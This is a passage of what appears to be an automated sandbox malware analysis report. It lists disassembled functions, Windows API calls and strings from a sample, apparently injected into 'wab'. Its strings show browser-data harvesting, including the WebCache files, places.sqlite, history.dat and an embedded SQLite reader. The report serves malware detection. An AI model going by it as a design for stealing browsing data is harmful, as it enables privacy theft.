                                                                                                                                                                                          • memset.MSVCRT ref: 00408888
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2911713577-0
                                                                                                                                                                                          • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                                                                          • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                                                                          • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0041F1A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcmp
                                                                                                                                                                                          • String ID: @ $SQLite format 3
                                                                                                                                                                                          • API String ID: 1475443563-3708268960
                                                                                                                                                                                          • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                                                          • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                                                                                                          • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00414C2E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77registryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                                                                                          • memset.MSVCRT ref: 00414C87
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                            • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressCloseProcVersionmemsetwcscpy
                                                                                                                                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                          • API String ID: 2705122986-2036018995
                                                                                                                                                                                          • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                                                                                          • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                                                                                                          • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                                                                                          • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004110DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _wcsicmpqsort
                                                                                                                                                                                          • String ID: /nosort$/sort
                                                                                                                                                                                          • API String ID: 1579243037-1578091866
                                                                                                                                                                                          • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                                                                          • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                                                                                                          • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                                                                          • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040E5ED Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                          • memset.MSVCRT ref: 0040E629
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                                                                                                          • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                                                                                                                                                          • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                                                                                          • API String ID: 3354267031-2114579845
                                                                                                                                                                                          • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                                                                          • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004148B6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                                                                                                                          • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                                                                                                          • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3473537107-0
                                                                                                                                                                                          • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                                          • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0044DEF7 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                          • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                                                          • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0043A9F6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 979COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                          • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                                                                                          • API String ID: 2221118986-1725073988
                                                                                                                                                                                          • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                                                          • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                                                                                                          • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004175B7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24sleepCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ChangeCloseFindNotificationSleep
                                                                                                                                                                                          • String ID: }A
                                                                                                                                                                                          • API String ID: 1821831730-2138825249
                                                                                                                                                                                          • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                                          • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                                                                                                          • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                                          • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004125B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??3@DeleteObject
                                                                                                                                                                                          • String ID: r!A
                                                                                                                                                                                          • API String ID: 1103273653-628097481
                                                                                                                                                                                          • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                                                                          • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040D092 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??2@
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1033339047-0
                                                                                                                                                                                          • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                                          • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                                                                                                          • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                                          • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00444B06 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                                                          • memcmp.MSVCRT ref: 00444BA5
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$memcmp
                                                                                                                                                                                          • String ID: $$8
                                                                                                                                                                                          • API String ID: 2808797137-435121686
                                                                                                                                                                                          • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                                          • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                                                                                                          • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00430737 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 94COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • too many columns on %s, xrefs: 00430763
                                                                                                                                                                                          • duplicate column name: %s, xrefs: 004307FE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: duplicate column name: %s$too many columns on %s
                                                                                                                                                                                          • API String ID: 0-1445880494
                                                                                                                                                                                          • Opcode ID: 2926fa06368f5232b18cfbe9a067055150ad8579ce0375914d7c8593e780dd9c
                                                                                                                                                                                          • Instruction ID: 332525b9e829d337f3b342900587a6bcab00951879d739311f42b30c77ca79e1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2926fa06368f5232b18cfbe9a067055150ad8579ce0375914d7c8593e780dd9c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E314735500705AFCB109F55C891ABEB7B5EF88318F24815BE8969B342C738F841CB99
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040E4B2 Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                            • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                            • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                            • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                            • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                            • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                            • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                            • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                                            • Part of subcall function 0040E01E: FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                                                                                                                            • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                                                                                                            • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                            • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
                                                                                                                                                                                          • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                                                                                                          • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                                                                                                                            • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                            • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                            • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$Close$ChangeFindHandleNotificationProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1042154641-0
                                                                                                                                                                                          • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                                                                          • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                                                                          • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00418758 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                                            • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                                                                                                            • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                                                                                                                                                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                          • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                                                                                                          • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00418803
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2947809556-0
                                                                                                                                                                                          • Opcode ID: 9c8f7abab99d1da351ac3b6f8ce72ab423c1774e4fe74519c125927a022e4df4
                                                                                                                                                                                          • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c8f7abab99d1da351ac3b6f8ce72ab423c1774e4fe74519c125927a022e4df4
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00403A16 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                                                                                                            • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                                                                                                            • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                                            • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                                          • memset.MSVCRT ref: 00403A55
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                                                                                                                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                                                                                                                            • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
                                                                                                                                                                                          • String ID: history.dat$places.sqlite
                                                                                                                                                                                          • API String ID: 3093078384-467022611
                                                                                                                                                                                          • Opcode ID: 7e5fa77ffbd80df454c8f06c208cb8abd3a99e536342b00205f9bee392087e79
                                                                                                                                                                                          • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e5fa77ffbd80df454c8f06c208cb8abd3a99e536342b00205f9bee392087e79
